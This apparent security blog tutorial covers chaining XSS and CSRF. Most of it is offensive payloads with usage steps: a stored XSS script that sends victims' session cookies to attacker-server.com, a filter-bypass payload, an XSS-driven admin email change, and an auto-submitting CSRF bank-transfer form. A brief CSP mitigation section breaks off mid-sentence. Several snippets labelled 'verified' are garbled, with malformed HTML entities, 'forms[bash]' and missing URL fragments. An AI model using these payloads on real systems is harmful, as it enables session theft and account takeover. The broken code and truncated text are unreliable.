Listen to this Post
Introduction:
Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF) remain two of the most pervasive and dangerous vulnerabilities in modern web applications. While often discussed separately, their combined potential for sophisticated attacks, as demonstrated in platforms like Hack The Box, can lead to complete account takeover and system compromise. This article delves into the advanced techniques that move beyond simple alert boxes to weaponize these flaws for real-world impact.
Learning Objectives:
- Understand the mechanics of advanced XSS attacks, including stored, reflected, and DOM-based variants.
- Learn how to chain XSS with CSRF to perform privileged actions on behalf of authenticated users.
- Master the commands and tools necessary to identify, exploit, and mitigate these critical vulnerabilities.
You Should Know:
- Crafting the Stored XSS Payload for Initial Foothold
A stored XSS vulnerability is the key to persistence, as the malicious script is saved on the target server and executed for every user who views the infected page. This is often the first step in a chain attack.
Verified Code Snippet:
<script>
fetch('https://attacker-server.com/steal?cookie=' + document.cookie);
</script>
Step-by-step guide:
This payload is designed to be injected into a vulnerable web application field, like a comment or profile description. When a victim user (including an administrator) loads the page containing this payload, the script executes automatically. It uses the `fetch()` API to make an HTTP request to an attacker-controlled server, appending the user’s session cookies as a URL parameter. The attacker monitoring their server logs can then capture these cookies and hijack the user’s authenticated session.
2. Bypassing Basic XSS Filters with Encoding
Web Application Firewalls (WAFs) and basic input filters often block common tags like <script>. Advanced exploitation requires techniques to obfuscate the payload.
Verified Code Snippet:
<IMG SRC=x onerror="&106;&97;&118;&97;&115;&99;&114;&105;&112;&116;&58;&97;&108;&101;&114;&116;&40;&49;&41;">
Step-by-step guide:
This payload uses an image tag with a deliberately invalid source (x). The `onerror` event handler, which executes when the image fails to load, contains the JavaScript `alert(1)` command encoded in HTML entities. The browser decodes these entities back into executable JavaScript before rendering the page, effectively bypassing simple filters that look for plaintext script blocks. Test this by injecting it into a search field that reflects input back to the page.
3. Weaponizing XSS to Perform CSRF Attacks
Once XSS is achieved, it can be used to forge requests from the victim’s browser, bypassing CSRF protections like anti-CSRF tokens because the script can read the token from the page.
Verified Code Snippet:
<script>
fetch('/admin/change-email', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ email: '[email protected]' })
});
</script>
Step-by-step guide:
This script, delivered via XSS, forces the victim’s browser to silently send a POST request to an application’s privileged endpoint (e.g., an email change function). Since the request is sent with the victim’s active session cookies, the application processes it as a legitimate user action. This chaining is devastating, as it turns a simple XSS into a full account takeover.
4. Exploiting DOM-Based XSS with the Fragment Identifier
DOM-based XSS occurs when client-side JavaScript unsafely handles data from the URL’s fragment (the part after the “).
Verified Code Snippet:
// Vulnerable Code on the target page
var target = document.getElementById('message');
target.innerHTML = decodeURIComponent(window.location.hash.substring(1));
Exploitation URL:
`https://vulnerable-site.com/error`
Step-by-step guide:
The vulnerable script takes the content after the “ in the URL and writes it directly into the page’s HTML using innerHTML. An attacker crafts a URL where the fragment contains a malicious HTML payload. When the victim is tricked into visiting this URL, the payload renders and executes. This attack is particularly stealthy as the payload is never sent to the server.
5. Manual CSRF Proof-of-Concept with HTML
Understanding the underlying HTML form that a CSRF attack forges is crucial for crafting exploits when automated tools fail.
Verified Code Snippet:
<html> <body> <form action="https://bank.com/transfer" method="POST"> <input type="hidden" name="amount" value="1000"> <input type="hidden" name="account" value="ATTACKER_ACCOUNT"> <input type="submit" value="View Cat Pictures!"> </form> <script>document.forms[bash].submit();</script> </body> </html>
Step-by-step guide:
This HTML file creates a hidden form that submits a malicious request to a banking transfer endpoint. The `action` attribute targets the vulnerable endpoint. The hidden `input` fields pre-fill the transaction details. The script at the bottom automatically submits the form. An attacker would host this file and lure a logged-in bank user to visit it. The form will submit seamlessly, initiating the transfer.
6. Mitigation: Implementing Content Security Policy (CSP)
The most effective defense against XSS is a strong Content Security Policy, which whitelists allowed sources of scripts and other resources.
Verified HTTP Header:
`Content-Security-Policy: default-src ‘self’; script-src ‘self’ https://trusted.cdn.com; object-src ‘none’;`
Step-by-step guide:
This header instructs the browser to only execute scripts that originate from the application’s own domain ('self') or a specific, trusted CDN. It also blocks all plugins (object-src 'none'). Even if an attacker successfully injects a `